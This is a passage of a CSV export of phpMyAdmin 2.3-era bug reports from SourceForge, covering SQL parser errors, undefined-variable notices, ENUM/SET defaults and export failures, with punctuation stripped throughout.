If you want to create a table with ENUM or SET say I have inputs a .. d so I follow what it says for the length values and put them in like that See below) CREATE TABLE `test2` `seting` SET a , b , c , d ) DEFAULT \ a\ ,\ b\ NOT NULL ) then it comes to the DEFAULT column i have to go WITHOUT the quotes.
now all of this backfires when I try to do sets or include the quotes when I specify my default for enums as above) generated ALTER TABLE `atable` CHANGE `acol` `acol` SET a , b , c , d ) DEFAULT a, b NOT NULL ALTER TABLE `atable` CHANGE `acol` `acol` SET a , b , c , d ) DEFAULT \ a\ , \ b\ NOT NULL I CANNOT find a way to specify more than a single item in the set for the default, which I would like to do.
Original URL https sourceforge.net p phpmyadmin bugs 650 https sourceforge.net p phpmyadmin bugs 650 Original author robbat2 Found in version 2.3.2","bug"
"24444","7021","2.3.3 dev) Marking rows does not work anymore.
Server WinNT 5.2 RC1, Apache 2.0.43, PHP 4.3.0 dev Client WinNT 5.1, IE 6.0 SP1 When klicking a row in browse mode in order to mark it, nothing happens.
2.3.2 with the same config works fine...
Original URL https sourceforge.net p phpmyadmin bugs 652 https sourceforge.net p phpmyadmin bugs 652 Original author rabus Found in version 2.3.2","bug"
"24444","7022","open basedir bug.
A few months ago I submitted a patch to let phpMyAdmin work on servers that use open basedir restrictions.
Some changes have been made since then to read dump.php, and now it is not working well.
I suggest not to do that check about the dot in open basedir path, and to replace it with a simple if !is writable .
tmp )) \{ this is line 257 ... \} else \{ ... \} Original URL https sourceforge.net p phpmyadmin bugs 653 https sourceforge.net p phpmyadmin bugs 653 Original author alexrj","bug"
"24444","7023","2.3.3 dev) Undefined index when modifying table keys.
Server Windows NT 5.2 RC1 Apache 2.0.43 PHP 4.3.0 dev MySQL 4.0.4 beta When modifying a table key, I recieve the following php error Notice Undefined index sql query in [pma dir] libraries common.lib.php3 on line 1108 But this bug has no further consequence the key gets modified without problems.
Original URL https sourceforge.net p phpmyadmin bugs 655 https sourceforge.net p phpmyadmin bugs 655 Original author rabus Found in version 2.3.2","bug"
"24444","7024","2.3.2) DefaultTabTable = tbl select.php3 .
With cfg[ DefaultTabTable ] = tbl select.php3 ; there is an undefined variable goto.
Also, Fatal error Cannot redeclare pma sqlformat ) previously declared in usr local etc www si php phpMyAdmin sql.php3 53) in usr local etc www si php phpMyAdmin sql.php3 on line 53 This needs to be tested better.
Original URL https sourceforge.net p phpmyadmin bugs 654 https sourceforge.net p phpmyadmin bugs 654 Original author lem9 Found in version 2.3.2","bug"
"24444","7025","2.3.3 dev) Error with table independent SELECTs.
Server Windows NT 5.2 RC1 Apache 2.0.43 PHP 4.3.0 dev MySQL 4.0.4 beta When performing a SELECT that does not affect any table like amp;quot;SELECT VERSION ); amp;quot; for instance, I recieve the following php errors Notice Undefined variable current table ref in [pma dir] libraries sqlparser.lib.php3 on line 857 Notice Undefined offset 0 in [pma dir]\libraries\sqlparser.lib.php3 on line 858 Notice Undefined offset 0 in [pma dir] libraries sqlparser.lib.php3 on line 859 Notice Undefined variable current table ref in [pma dir] libraries sqlparser.lib.php3 on line 857 Notice Undefined variable save table ref in [pma dir] libraries sqlparser.lib.php3 on line 910 Followed up by some header warnings, as usual.
Original URL https sourceforge.net p phpmyadmin bugs 656 https sourceforge.net p phpmyadmin bugs 656 Original author rabus Found in version 2.3.2","bug"
"24444","7026","2.3.3 dev) Error when clicking quot;delete quot; in browse mode.
Server Windows NT 5.2 RC1 Apache 2.0.43 PHP 4.3.0 dev MySQL 4.0.4 beta When I am in browse mode and try to delete a record via the delete link, I get to a confirmation page with a nice php error output on top Notice Undefined variable seen end of table ref in [pma dir] libraries sqlparser.lib.php3 on line 856 Notice Undefined variable seen end of table ref in [pma dir] libraries sqlparser.lib.php3 on line 898 Notice Undefined variable seen end of table ref in [pma dir] libraries sqlparser.lib.php3 on line 917 Notice Undefined variable seen end of table ref in [pma dir] libraries sqlparser.lib.php3 on line 856 Notice Undefined variable seen end of table ref in [pma dir] libraries sqlparser.lib.php3 on line 898 Notice Undefined variable seen end of table ref in [pma dir] libraries sqlparser.lib.php3 on line 917 Notice Undefined variable seen end of table ref in [pma dir] libraries sqlparser.lib.php3 on line 856 Notice Undefined variable seen end of table ref in [pma dir] libraries sqlparser.lib.php3 on line 898 Notice Undefined variable seen end of table ref in [pma dir] libraries sqlparser.lib.php3 on line 917 Notice Undefined variable seen end of table ref in [pma dir] libraries sqlparser.lib.php3 on line 856 Notice Undefined variable seen end of table ref in [pma dir] libraries sqlparser.lib.php3 on line 898 They are as usually followed up by some header warnings.
Original URL https sourceforge.net p phpmyadmin bugs 657 https sourceforge.net p phpmyadmin bugs 657 Original author rabus Found in version 2.3.2","bug"
"24444","7027","2.3.3 dev) Aliases are treated like foreign keys.
To Reproduce this rather rare bug, do the following Create two tables with the following structure CREATE TABLE `table1` `id` tinyint 3) unsigned NOT NULL auto increment, `value` varchar 20) NOT NULL default , PRIMARY KEY `id`) ) TYPE=MyISAM COMMENT= the master table ; INSERT INTO `table1` `value`) VALUES foo ), bar ), foobar ), barfoo ); CREATE TABLE `table2` `id` tinyint 3) unsigned NOT NULL auto increment, `foreign` tinyint 3) unsigned NOT NULL default 0 , PRIMARY KEY `id`) ) TYPE=MyISAM COMMENT= this table uses a foreign key ; INSERT INTO `table2` `foreign`) VALUES 4), 1), 3), 1), 2), 3); Set `value` as the display field for `table1`.
`table2`.`foreign` is a foreign key field that uses `table1`.`id` as source field.
Next, perform the following query SELECT `table2`.`id`, `table1`.`value` AS amp;quot;foreign amp;quot; FROM `table2` LEFT JOIN `table1` ON `table2`.`foreign` = `table1`.`id`; As you may see, phpMyAdmin takes the alias field amp;quot;foreign amp;quot; for the real field `table2`.`foreign` and tries to link it.
Or take the next example SELECT `table2`.`id`, `table2`.`foreign`, `table1`.`value` AS amp;quot;foreign amp;quot; FROM `table2` LEFT JOIN `table1` ON `table2`.`foreign` = `table1`.`id`; Here, we so have the real `table2`.`foriegn` field as well as the alias I used in my previous example.
Now BOTH, the table field and the alias one, are interpretated as foreign keys.
Original URL https sourceforge.net p phpmyadmin bugs 658 https sourceforge.net p phpmyadmin bugs 658 Original author rabus Found in version 2.3.2","bug"
"24444","7028","2.3.2) Relationship Bldr, not giving all option.
I have a table states id TINYINT 2) UNSIGNED AUTO INCREMENT PRIMARY KEY I have another table school district state id TINYINT 2) UNSIGNED However in the relationships view, there is no link to states amp;gt;id Original URL https sourceforge.net p phpmyadmin bugs 659 https sourceforge.net p phpmyadmin bugs 659 Original author timcrider Found in version 2.3.2","bug"
"24444","7029","2.3.3 dev) Entering value in field should clear NULL.
http bugs.debian.org 168979 From Christopher Wolf amp;lt;cwolf thewolfden.org amp;gt; Subject Bug 168979 phpmyadmin Entering value in field currently marked NULL should clear NULL Forgetting to uncheck the NULL checkbox will result in the entered data being discarded.
Since it seems preferable that one be allowed to clear a long field by checking the NULL checkbox, entering data in a currently NULL field should clear it automatically and imediately on the screen and data in the field should not quietly override a checked NULL checkbox.
Original URL https sourceforge.net p phpmyadmin bugs 660 https sourceforge.net p phpmyadmin bugs 660 Original author d3xter Found in version 2.3.2","bug"
"24444","7030","2.3.2) Edit or Delete and alias.
SELECT p.person name as the name FROM persons p and we cannot edit or delete the rows.
Original URL https sourceforge.net p phpmyadmin bugs 663 https sourceforge.net p phpmyadmin bugs 663 Original author lem9 Found in version 2.3.2","bug"
"24444","7031","2.3.2) FULLTEXT is not detected correctly MySQL amp;gt;= 4.0.2).
After altering the Index type to FULLTEXT multiple or single columns) on the structure page it still displays INDEX instead of FULLTEXT.
amp;quot;SHOW INDEX FROM amp;quot; however shows the right index type.
Original URL https sourceforge.net p phpmyadmin bugs 661 https sourceforge.net p phpmyadmin bugs 661 Original author lars stecken Found in version 2.3.2","bug"
"24444","7032","2.3.3) bookmarks and confirmation.
I am working on various problems introduced by the new stripslashes ) added at the beginning of sql.php3.
Original URL https sourceforge.net p phpmyadmin bugs 662 https sourceforge.net p phpmyadmin bugs 662 Original author lem9","bug"
"24444","7033","2.3.2) table name with a quote.
Try to create a table named L ami we see that we probably need a stripslashes ) in tbl create.php3, but there are other issues trying to alter a field name clicking on the table name in the left pane clicking on the db name, then on Properties of this table Original URL https sourceforge.net p phpmyadmin bugs 664 https sourceforge.net p phpmyadmin bugs 664 Original author lem9 Found in version 2.3.2","bug"
"24444","7034","2.3.3 dev) SHOW INDEXES.
In MySQL 4 amp;quot;SHOW INDEXES amp;quot; was implemented as a synonym for amp;quot;SHOW INDEX amp;quot;.
This command is not highlighted correctly by the parser.
Original URL https sourceforge.net p phpmyadmin bugs 665 https sourceforge.net p phpmyadmin bugs 665 Original author rabus Found in version 2.3.2","bug"
"24444","7035","HTML entities in db table name.
I noticed some problems with db table names containing HTML entities If you have a db named m amp;amp;amp;m for instance, it is sometimes displayed correctly and sometimes as m amp;amp;m!
Furthermore, you cannot work with this db, because there will always be a MySQL error like No Database Selected returned.
I ll work on this asap.
Original URL https sourceforge.net p phpmyadmin bugs 666 https sourceforge.net p phpmyadmin bugs 666 Original author rabus Found in version 2.3.2","bug"
"24444","7036","2.3.2) Just put a single quote in the querybox.
If you have a in your request, it doesn t work and it send to download read dump.php Original URL https sourceforge.net p phpmyadmin bugs 667 https sourceforge.net p phpmyadmin bugs 667 Original author plom Found in version 2.3.2","bug"
"24444","7037","2.3.3 rc1) no nav.
menu GROUP BY .
Normally there is a navigation menu to show the next last 30 rows at a query.
But using the statement SELECT ID FROM `sites` GROUP BY ID is it not possible.
On the same computer using phpMyAdmin 2.3.2 I get Showing rows 0 29 1819 total) SQL query [Edit] etc.
[query] [navigation menu] [data, where I can sort if I click on a column name] Using phpMyAdmin 2.3.3 rc1 I get [ !)
marks the difference] !)
SQL query SQL query [Edit] etc.
[query] !)
[no navigation menu] !)
[data, but the table column are no links so I cannot sort them beside of an explicit SQL query] Original URL https sourceforge.net p phpmyadmin bugs 668 https sourceforge.net p phpmyadmin bugs 668 Original author ci dev Found in version 2.3.3 rc1","bug"
"24444","7038","2.3.3 rc1) drop table using alter table.
I get an 404 error if I try to the following create a table with 2 columns goto structure view select both columns and hit the drop button say yes to confirmation now click the back link You will see an 404 error.
I tried this using Opera 6.05 with might be of interest becase of JavaScript capabilities...
Original URL https sourceforge.net p phpmyadmin bugs 669 https sourceforge.net p phpmyadmin bugs 669 Original author ci dev Found in version 2.3.3 rc1","bug"
"24444","7039","2.3.3 rc1) Unable to add bookmark.
When trying to add a bookmark, I get these php errors Notice Undefined variable sql query in [pma dir] sql.php on line 46 Warning Cannot add header information headers already sent by output started at [pma dir] sql.php 46) in [pma dir] sql.php on line 67 Notice Undefined variable sql query in [pma dir] sql.php on line 84 Notice Undefined variable sql query in [pma dir] sql.php on line 85 Notice Undefined index len in [pma dir] libraries sqlparser.lib.php on line 563 Notice Undefined index len in [pma dir] libraries sqlparser.lib.php on line 1070 Notice Undefined offset 0 in [pma dir] libraries sqlparser.lib.php on line 1076 Notice Undefined variable db in [pma dir] sql.php on line 273 They are, as usual, followed by several header errors.
In addition to this, the MySQL server returns the error message amp;quot;Query was empty amp;quot;.
Original URL https sourceforge.net p phpmyadmin bugs 670 https sourceforge.net p phpmyadmin bugs 670 Original author rabus Found in version 2.3.3 rc1","bug"
"24444","7040","Numeric Field Names problem.
When using numbers for fieldnames eg 1, 2, 3, 4 ), the ouput of browsing that table will be messed up.
The following example shows what happens.
id sid stamp chkd 1 2 3 1 6080 378964 385044 6080 378964 385044 2 4816 380228 385044 4816 380228 385044 The data is correct in the database, but when you want to view it in the browse section it will use the field id to show the data.
This output should be id sid stamp chkd 1 2 3 1 3 1000000000 0 6080 378964 385044 2 2 1000000300 1 4816 380228 385044 Original URL https sourceforge.net p phpmyadmin bugs 671 https sourceforge.net p phpmyadmin bugs 671 Original author aukjan Found in version 2.2.6","bug"
"24444","7041","phpmyadmin w php Problem.
phpMyAdmin turn back this error 1) in top window titled SQL Query when submitting SQL Query 2).
A florian avs18.com 1 Warning Uninitialized string offset 138 in home sites defaut ndd wm network.com mysql libraries sqlparser.lib.php on line 401 requxc4x99te SQL [Modifier] [Expliquer SQL] [Crxc3xa9er source PHP] SELECT A.nom fct as nom dep FROM `fct` A, `fct` B WHERE A.id fct = B.id dependance fct AND B.nom fct = HOMEDIR AND B.id dependance fct amp;lt; amp;gt; 0 LIMIT 0, 30 2 SELECT A.nom fct as nom dep FROM `fct` A, `fct`B WHERE A.id fct=B.id dependance fct AND B.nom fct = HOMEDIR AND B.id dependance fct amp;lt; amp;gt; 0 Original URL https sourceforge.net p phpmyadmin bugs 672 https sourceforge.net p phpmyadmin bugs 672 Original author anonymous Found in version 2.3.0","bug"
"24444","7042","inserting from file, incorrect rowcount.
I choose Insert data from a textfile into table from the structure page then upload file return inserted rows 1 but i just uploaded a file with over 2000 lines and it worked ok.
This is the output after upload Inserted rows 1 SQL query [Edit] [Create PHP Code] LOAD DATA LOCAL INFILE tmp phpMZvnFZ REPLACE INTO TABLE `waka db paddlers` FIELDS TERMINATED BY \t OPTIONALLY ENCLOSED BY amp;quot; ESCAPED BY \\ LINES TERMINATED BY \r\n Just a side note, shouldn t the insert data from textfile be on the Insert Page ?
Alex Original URL https sourceforge.net p phpmyadmin bugs 673 https sourceforge.net p phpmyadmin bugs 673 Original author bumperbox Found in version 2.3.3 rc1","bug"
"24444","7043","SQL query parsing INTERVAL.
For example this SQL command return an syntax error DELETE FROM web session WHERE web dtcre amp;lt; DATE SUB NOW ), INTERVAL 10 HOUR ) But PHPMyAdmin change the query to DELETE FROM web session WHERE web dtcre amp;lt; DATE SUB NOW ), interval10 HOUR ) I think parsing of keyword amp;quot;INTERVAL amp;quot; have been missed.
Sorry for my english Perrich Original URL https sourceforge.net p phpmyadmin bugs 674 https sourceforge.net p phpmyadmin bugs 674 Original author anonymous Found in version 2.3.3 rc1","bug"
"24444","7044","2.3.2) SQL Syntax Error.
It looks like there is a problem with magic quotes Database with the character are displayed as name\ db instead of name\ db as in older versions).
If you want to delete the privileges from a database you get the following error SQL query REVOKE ALL PRIVILEGES ON `` phlgui `` .
FROM phlgui localhost MySQL said You have an error in your SQL syntax near phlgui``.
FROM phlgui localhost at line 1 This hapens with PHP Version 4.3.0 dev.
phpMyAdmin 2.3.2 and PHP 4.2.2 phpMyAdmin 2.3.2 mySQL 3.23.53 Also amp;quot;Check database privileges amp;quot; in the users Section doesn t work.
It only shows the rights of users with database amp;quot;all amp;quot; privileges.
The magic quotes settings in php.ini are not relevant.
Stephan Schrade schrade ondics.de Original URL https sourceforge.net p phpmyadmin bugs 675 https sourceforge.net p phpmyadmin bugs 675 Original author anonymous Found in version 2.3.2","bug"
"24444","7045","incorrect affected rows count.
After some operations like UPDATE or DELETE queries number of affected rows is incorrect in fact, it have value amp;quot;1 amp;quot; instead of correct).
Original URL https sourceforge.net p phpmyadmin bugs 676 https sourceforge.net p phpmyadmin bugs 676 Original author anonymous Found in version 2.3.3 rc1","bug"
"24444","7046","2.3.3 rc1) ucfirst ) php function causes trouble.
Hello all, I m having a problem on displaying text using zh tw utf 8) the problem is that amp;quot;Tables amp;quot; amp;quot;Action amp;quot; amp;quot;Recrode amp;quot; amp;quot;Type amp;quot; amp;quot;Size amp;quot; Under the Database Page.
Which is line 61 db details structure.php amp;lt;th amp;gt; amp;amp;nbsp; amp;lt;?php echo ucfirst strTable); ?
amp;gt; amp;amp;nbsp; amp;lt; th amp;gt; amp;lt;th colspan= amp;quot;6 amp;quot; amp;gt; amp;lt;?php echo ucfirst strAction); ?
amp;gt; amp;lt; th amp;gt; amp;lt;th amp;gt; amp;lt;?php echo ucfirst strRecords); ?
amp;gt; amp;lt; th amp;gt; amp;lt;th amp;gt; amp;lt;?php echo ucfirst strType); ?
amp;gt; amp;lt; th amp;gt; at the same time On Line 337 db details structure.php amp;lt;th amp;gt; amp;amp;nbsp; amp;lt;?php echo ucfirst strTable); ?
amp;gt; amp;amp;nbsp; amp;lt; th amp;gt; amp;lt;th colspan= amp;quot;6 amp;quot; amp;gt; amp;lt;?php echo ucfirst strAction); ?
amp;gt; amp;lt; th amp;gt; amp;lt;th amp;gt; amp;lt;?php echo ucfirst strRecords); ?
amp;gt; amp;lt; th amp;gt; These 2 are the sources of showing the Wrong text, and are the source of causing the problem.
Without ucfirst ) the Problem wouldn t be there but there must be a reason that ucfirst ) is there.
Could anyone help me with it?
or this can just be remove?
BTW, I m using 2.3.3 rc1 Original URL https sourceforge.net p phpmyadmin bugs 677 https sourceforge.net p phpmyadmin bugs 677 Original author dcmwai Found in version 2.3.3 rc1","bug"
"24444","7047","2.3.3 rc1) Unable to validate.
Fatal error Cannot instantiate non existent class pma sqlvalidator in c \apache\htdocs\phpmyadmin\libraries\sqlvalidator.li b.php on line 70 Original URL https sourceforge.net p phpmyadmin bugs 678 https sourceforge.net p phpmyadmin bugs 678 Original author hagman Found in version 2.3.3 rc1","bug"
"24444","7048","2.3.3 dev) Error on invalid insert.
When trying to insert a record that is refused by the MySQL server because of a dublicate key error, for instance) an error page is displayed.
If I click the amp;quot;back amp;quot; link here, I get some php errors Notice Undefined variable db in [pma dir] tbl properties common.php3 on line 27 Notice Undefined variable db in [pma dir] tbl properties common.php3 on line 32 Notice Undefined variable table in [pma dir] tbl properties common.php3 on line 33 Original URL https sourceforge.net p phpmyadmin bugs 679 https sourceforge.net p phpmyadmin bugs 679 Original author rabus Found in version 2.3.3 rc1","bug"
"24444","7049","2.3.3 rc1) Altering ENUM fields doesn t work.
Create a field with an enum type, now change it, add an element to the value list.
Click save.
The SQL that is generated is for the old content of the value list, so the change is lost.
Original URL https sourceforge.net p phpmyadmin bugs 680 https sourceforge.net p phpmyadmin bugs 680 Original author coolbru Found in version 2.3.3 rc1","bug"
"24444","7050","Browse table corrupt.
The usual edit delete column has been messed up in a row containing a medium sized text field.
I ve removed a questionable character but it had no effect.
This happens in ie and ns.
I m running apache on linux, the latest php and mysql.
http karf.net tmp phpmyadmintop.gif http karf.net tmp phpmyadminbottom.gif The content does not appear to be corrupt since I can display it correctly on my pages.
For me, this is not a huge priority, but I thought I d come and report what I d found.
Original URL https sourceforge.net p phpmyadmin bugs 681 https sourceforge.net p phpmyadmin bugs 681 Original author anonymous Found in version 2.3.2","bug"
"24444","7051","Unable to insert enum .
This might be a rather rare bug, but...
Try to insert a string like enum into a table field.
phpMyAdmin will insert an empty string instead!
Original URL https sourceforge.net p phpmyadmin bugs 682 https sourceforge.net p phpmyadmin bugs 682 Original author rabus Found in version 2.3.3","bug"
"24444","7052","amp;quot;no amp;quot; as table alias.
When I submit a query with the alias amp;quot;no amp;quot; for a table called nodes).
The alias is not understanding by PMA as an alias but as an operator or something else.
Then I can t execute my query, because in the where clause I use no.name which is not recognize as a valid field because table amp;quot;no amp;quot; is unknown according to mysql.
Original URL https sourceforge.net p phpmyadmin bugs 683 https sourceforge.net p phpmyadmin bugs 683 Original author mdelorme Found in version 2.3.3","bug"
"24444","7053","2.3.3) wrong record count GROUP BY an alias.
when i submit a query the number a record is not the same as the value recalled upon the sql query.
I use group by in the sql query Original URL https sourceforge.net p phpmyadmin bugs 684 https sourceforge.net p phpmyadmin bugs 684 Original author mdelorme Found in version 2.3.3","bug"
"24444","7054","2.3.3) Undefined variable strTotalUC.
Changes in revision 1.24 of tbl properties structure.php causes the following warning message amp;quot;Warning Undefined variable strTotalUC in home www html phpMyAdmin tbl properties structure.php on line 369 amp;quot; Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin bugs 685 https sourceforge.net p phpmyadmin bugs 685 Original author bth Found in version 2.3.3","bug"
"24444","7055","2.3.3) empty drop down box.
When doing a SELECT, some drop down boxes are empty.
These fields have a relation to another table with many entries.
It seems that PHPMyadmin can t handle it and it doesn t make sense to display several thousands items in a dropdown box at all.
Original URL https sourceforge.net p phpmyadmin bugs 686 https sourceforge.net p phpmyadmin bugs 686 Original author j0erch Found in version 2.3.3","bug"
"24444","7056","2.3.3 pl1) usernames containing character.
In main.php when checking for user privileges for create.
The line that gets mysql cur user doesn t take into account usernames with an in them.
Changing strpos blah ) functions to strrpos takes into account usernames with due to the fact is works backwards on the username host.
So sd!
amp;quot; xc5x81 192.168.0.1 would then be correctly split.
Small bug but it wound me up, when I wanted to show processlist and create db s. Devil.
Original URL https sourceforge.net p phpmyadmin bugs 687 https sourceforge.net p phpmyadmin bugs 687 Original author anonymous Found in version 2.3.3 pl1","bug"
"24444","7057","Wrong row count with UNION SELECTs.
Windows NT 5.2 RC1 Apache 2.0.43 PHP 4.4.0 dev latest CVS) MySQL 4.0.5 beta phpMyAdmin 2.3.4 dev latest CVS) When I send a query like SELECT `foobar` FROM `foo`) UNION SELECT `foobar` FROM `bar`); results in some amp;quot;undefined variables amp;quot; Notice Undefined variable seen end of table ref in [pma dir] libraries sqlparser.lib.php3 on line 922 Notice Undefined variable seen end of table ref in [pma dir] sqlparser.lib.php3 on line 941 As usual, they are followed up by some header errors.
Original URL https sourceforge.net p phpmyadmin bugs 688 https sourceforge.net p phpmyadmin bugs 688 Original author rabus Found in version 2.4.0 rc1","bug"
"24444","7058","2.3.2) Compressed export returns empty file.
PHP 4.2.2 phpMyAdmin 2.3.2 MySQL 3.23.52 gzip 1.3.3 The compressed export amp;quot;zipped amp;quot; amp;quot;gzipped amp;quot; amp;quot;bzipped amp;quot;) returns an empty file when there are many tables selected 500 ).
The file is not readable by compression application such as gzip.
The non compressed export seems to work correctly even with a high number of tables.
The compressed export works correctly when a low number of tables are selected 20 30).
Thanks in advance, Real Original URL https sourceforge.net p phpmyadmin bugs 689 https sourceforge.net p phpmyadmin bugs 689 Original author real carbonneau Found in version 2.3.2","bug"
"24444","7059","2.3.2) Database view empty with 1000 tables.
PHP 4.2.2 phpMyAdmin 2.3.2 MySQL 3.23.52 gzip 1.3.3 Browser same problem with IE on Windows and Mozilla on Linux.
For a database that contains 1000 tables, the database view script db details structure.php) does not return any data and as a result the right frame windows remains empty.
For the left frame, it seems to correctly list all the tables.
It might be good to put a limit on how many tables are listed and provide a next button.
Thanks in advance, Real Original URL https sourceforge.net p phpmyadmin bugs 690 https sourceforge.net p phpmyadmin bugs 690 Original author real carbonneau Found in version 2.3.2","bug"
"24444","7060","2.3.3 pl1) Back Link doesn t work.
stollner at uni muenster dot de Select any table, go to the option section, choose checksum and click on ok.
If there is an errormessage e.g.
you don t have the right) the back link won t work.
You can fix that by commenting out line 10 in the tbl properties options.php file.
Mischka Original URL https sourceforge.net p phpmyadmin bugs 692 https sourceforge.net p phpmyadmin bugs 692 Original author anonymous Found in version 2.3.3 pl1","bug"
"24444","7061","2.3.4 dev) bzip2 db export fails with php 4.2.1.
When I try to export bzipped data for database I always get just 2 byte file with amp;quot; 8 amp;quot; in it.
Same export works ok for table.
It doesn t depend on export type SQL CSV XML).
Original URL https sourceforge.net p phpmyadmin bugs 691 https sourceforge.net p phpmyadmin bugs 691 Original author nijel","bug"
"24444","7062","2.3.x) Some dump crashes IE 6.
Server Windows NT 5.2 RC1 Apache 2.0.43 PHP 4.4.0 dev latest CVS) MySQL 4.0.5 beta phpMyAdmin 2.3.4 dev latest CVS) Client Windows NT 5.1 Internet Explorer 6.0 SP1 Netscape 7.01 Mozilla 1.2.1 Opera 6.05 I selected all tables of my db for the LaTeX export.
Having submitted the form, IE crashes silently.
The other browsers mentioned above display some amp;quot;undefined variables amp;quot; instead Notice Undefined variable buffer in [pma dir] libraries build dump.lib.php3 on line 684 This message appears as often as tables are selected.
Original URL https sourceforge.net p phpmyadmin bugs 693 https sourceforge.net p phpmyadmin bugs 693 Original author rabus Found in version 2.3.3 pl1","bug"
"24444","7063","2.3.4 dev) edit SQL query not always work.
Open database view of a database and select browse for any table.
Then click edit in the SQL query box and instead of being redirected to the edit query page, you are back to the database overview.
Tested with 2.3.4 dev your demo) and with 2.3.3 rc1 installed locally).
Original URL https sourceforge.net p phpmyadmin bugs 694 https sourceforge.net p phpmyadmin bugs 694 Original author ci dev Found in version 2.3.3 rc1","bug"
"24444","7064","relation link on COUNT column.
I use the query amp;quot;SELECT COUNT ) AS cnt, RefererID FROM members GROUP BY RefererID amp;quot; and the column RefererID is correctly a relation to another row with that id but the cnt column refers to that relation, too, i.e.
when cnt has the value 14 it links to the same row as when RefererID would be 14 .
The query amp;quot;SELECT COUNT ), RefererID FROM members GROUP BY RefererID amp;quot; is interpreted right as here only RefererID is a relation.
amp;quot;SELECT COUNT ) AS cnt, RefererID as ref FROM members GROUP BY RefererID amp;quot; is interpreted right, too.
Original URL https sourceforge.net p phpmyadmin bugs 695 https sourceforge.net p phpmyadmin bugs 695 Original author ci dev Found in version 2.4.0 rc1","bug"
"24444","7065","2.3.3 pl1) PHP warnings about ob gzhandler php 4.3.0.
I m running OpenBSD 3.1 stable with PHP 4.3.0 cvs on Apache 1.3.24 with OpenBSD patches).
I ve just noticed that phpmyadmin is generating warnings on every page request, though it seems to be working just fine.
The errors look like this [error] PHP Warning null) ) [ amp;lt;a href= http www.php.net ref.outcontrol amp;gt;ref.outcontrol amp;lt; a amp;gt;] output handler ob gzhandler cannot be used twice in Unknown on line 0 This is not the same problem as bug 445348, but it may have similarities.
Original URL https sourceforge.net p phpmyadmin bugs 696 https sourceforge.net p phpmyadmin bugs 696 Original author coolbru Found in version 2.3.3 pl1","bug"
"24444","7066","2.3.3 pl1) New privileges are not detected correctly.
When doing a GRANT, the parser does not detect some of the new privileges SUPER EXECUTE REPLICATION SLAVE REPLICATION CLIENT Original URL https sourceforge.net p phpmyadmin bugs 697 https sourceforge.net p phpmyadmin bugs 697 Original author rabus Found in version 2.3.3 pl1","bug"
"24444","7067","Deleting a row with textarea and 2 lines.
I have found out a bug that prevents a record to be deleted using phpMyAdmin.
I have a table with 3 entrys, 1 id, a text and a date I used a litle script to input in the text area.
I use string=addslashes nl2br string)) to add the slashes and replace a carriage return with a amp;lt;br amp;gt; for HTML formating.
string had the value amp;quot;Testing amp;quot; then carriage return and amp;quot;test amp;quot; I got the following saved in mysql Testing \n\r amp;lt;br amp;gt; test I was not able to delete this entry UNTIL i edited it and removed the \n\r amp;lt;br amp;gt; caracteres.
Are you aware of this bug ?
Thank you for your time, was a pleasure to contribute Original URL https sourceforge.net p phpmyadmin bugs 698 https sourceforge.net p phpmyadmin bugs 698 Original author anonymous Found in version 2.3.3 pl1","bug"
"24444","7068","mod gzip and output compression.
i am getting a lot of warnings like [Fri Jan 3 23 55 51 2003] [error] PHP Warning null) ) [ amp;lt;a href= http www.php.net ref.outcontrol amp;gt;ref.outcontrol amp;lt; a amp;gt; ] output handler ob gzhandler cannot be used twice in Unknown on line 0 when using phpmyadmin, I am using apache 1.3.27, php 4.3.0 and mod gzip, i have in my php.ini file output handler = amp;quot; amp;quot; zlib.output compression = Off I think, that phpmyadmin should check for mod gzip before using php`s compression in ob.lib.php to avoid this warning messages.
Original URL https sourceforge.net p phpmyadmin bugs 701 https sourceforge.net p phpmyadmin bugs 701 Original author offcer Found in version 2.3.3 pl1","bug"
"24444","7069","2.3.3) No php check for mysql module.
I am running phpMyAdmin 2.3.3pl1 with PHP 4.30 My phpmyadmin installation recently started giving me a blank white screen after logging in.
No errors on the screen, no errors in the logs, no matter how much I turned up the error level.
I debugged for several days before finally tracking the error down to the connect func ) call on line 639 of libraries common.lib.php This calls mysql connect ) but since there s an amp;quot; amp;quot; in front of it, it fails without a message of any kind.
My suggestion is to use extension loaded ) to make sure the mysql extension is loaded, and give the user a reminder message if it s not.
This would have saved me a lot of time.
It just doesn t make sense to have the entire script die with zero messages if somebody forgets to enable mysql.so Original URL https sourceforge.net p phpmyadmin bugs 702 https sourceforge.net p phpmyadmin bugs 702 Original author anonymous","bug"
"24444","7070","2.3.3pl1) Relations system broken?.
When you click the Data Dictionary link for a database, a table is displayed with space for comments.
But I am unable to insert any comments.
I would like to be able to do this!
Original URL https sourceforge.net p phpmyadmin bugs 699 https sourceforge.net p phpmyadmin bugs 699 Original author anonymous","bug"
"24444","7071","2.3.3 pl1) register globals off.
Hi, I found a small bug in phpMyadmin that is very simple to solve.
The problem is that phpMyadmin was made thinking that register globals was on.
In my case, I have that option off, so phpMyadmin returned a lot os errors.
The solution create a .htaccess file in every folder isn t necessary in images and lang ) with the following php flag register globals on But this only solves half the problem, because this only works with php running as module.
When it is running as cgi this won t work.
SO I think you shoul change variables to POST[ variable ] GET[ variable ].
I hope I helped this big project, Nuno Lopes Original URL https sourceforge.net p phpmyadmin bugs 704 https sourceforge.net p phpmyadmin bugs 704 Original author anonymous Found in version 2.3.3 pl1","bug"
"24444","7072","2.4.0 dev) db details qbe and one table.
Doing a QBE with just one table persons) results in Undefined offset 0 on line 896 because col cand[0] does not exist.
In this case, col cand[ persons ] = amp;gt; persons .
And it generates FROM , persons Original URL https sourceforge.net p phpmyadmin bugs 700 https sourceforge.net p phpmyadmin bugs 700 Original author lem9","bug"
"24444","7073","foreign key in another database.
Changing the foreign db in the PMA relation tables doesn t work.
pma always looks for the table in the current master db database.
But changing the uri which pma creates for a relation field seems to work without any problem sql.php?lang=en iso 8859 1 amp;amp;server=1 amp;amp;convcharset=iso 8859 1 amp;amp;db=main amp;amp;table=members amp;amp;pos=0 amp;amp;session max rows=30 amp;amp;dontlimitchars=0 amp;amp;sql query=SELECT 2A FROM 60members 60 WHERE 60memberID 60 3D 844 is the link created by pma; simple change db=main to the proper database will work.
Original URL https sourceforge.net p phpmyadmin bugs 703 https sourceforge.net p phpmyadmin bugs 703 Original author ci dev Found in version 2.4.0","bug"
"24444","7074","2.3.3pl1) unable to import files created by mysqldump.
Like this MySQL dump 8.22 Host localhost Database database Server version 3.23.54 Original URL https sourceforge.net p phpmyadmin bugs 705 https sourceforge.net p phpmyadmin bugs 705 Original author explosive Found in version 2.3.3 pl1","bug"
"24444","7075","2.3.3 pl1) Error when running year month queries.
